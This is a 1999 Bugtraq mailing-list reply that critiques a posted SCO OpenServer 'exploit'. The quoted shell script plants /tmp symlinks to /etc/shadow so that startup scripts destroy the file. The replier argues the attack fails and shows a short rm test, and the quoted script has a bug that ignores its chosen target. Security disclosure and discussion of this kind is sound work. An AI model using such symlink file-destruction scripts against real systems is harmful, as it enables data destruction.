Bugtraq mailing list archives
Re: Little exploit for startup scripts (SCO 5.0.4p).
From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Mon, 8 Mar 1999 08:43:15 +0100
On Sun, Mar 07, 1999 at 03:07:23PM +0300, leshka wrote:
#!/bin/sh # # ... The punishment for inobedience ... # (Cycle # 2) # # This simple script can help to erase any file # (SCO OpenServer Enterprise System v 5.0.4p).
Umm.. I don't think so...
if [ _$1 = "_" ] then { echo -n "File to delete [/etc/shadow]:" read victim_file if [ _$victim_file = "_" ] then victim_file="/etc/shadow" fi } else victim_file=$1 fi
nice.
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
nice.
lastpid=`expr $pid - 30`
good thinking!
while [ $pid != $lastpid ] do pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
nice.
done echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
No. rm -f removes just the symlink, not the target file. Try this (tested on Linux, but SCO doesn't seem too broken to me): # touch /etc/blah $ ln -sf /etc/blah /tmp/blih # rm -f /tmp/blih # ls -al /etc/blah -rw-r--r-- 1 root root 0 Mar 8 08:40 /etc/blah Doesn't look very deleted to me... Greetz, Peter. -- .| Peter van Dijk | <mo|VERWEG> stoned worden of coden .| peter () attic vuurwerk nl | <mo|VERWEG> dat is de levensvraag | <mo|VERWEG> coden of stoned worden | <mo|VERWEG> stonend worden En coden | <mo|VERWEG> hmm | <mo|VERWEG> dan maar stoned worden en slashdot lezen:)
Current thread:
- buffer overflow in /usr/bin/cancel, (continued)
- buffer overflow in /usr/bin/cancel Josh A. Strickland (Mar 05)
- Re: Linux /usr/bin/gnuplot overflow -- SuSE hasnt fixed lsof Mario Lorenz (Mar 05)
- Update to Microsoft Security Bulletin (MS99-006) aleph1 () UNDERGROUND ORG (Mar 05)
- More Internet Explorer zone confusion Jim Paris (Mar 05)
- Re: More Internet Explorer zone confusion Walt Armour (Mar 08)
- Re: More Internet Explorer zone confusion Jeremy Nimmer (Mar 08)
- Re: More Internet Explorer zone confusion Jim Paris (Mar 08)
- ISAPI Extension vulnerability allows to execute code as SYSTEM Aleph One (Mar 08)
- Re: More Internet Explorer zone confusion David E. Smith (Mar 08)
- Little exploit for startup scripts (SCO 5.0.4p). leshka (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Peter van Dijk (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Taneli Leppä (Mar 08)
- Call for Papers: CQRE Detlef Hühnlein (Mar 08)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Jon Coyle (Mar 08)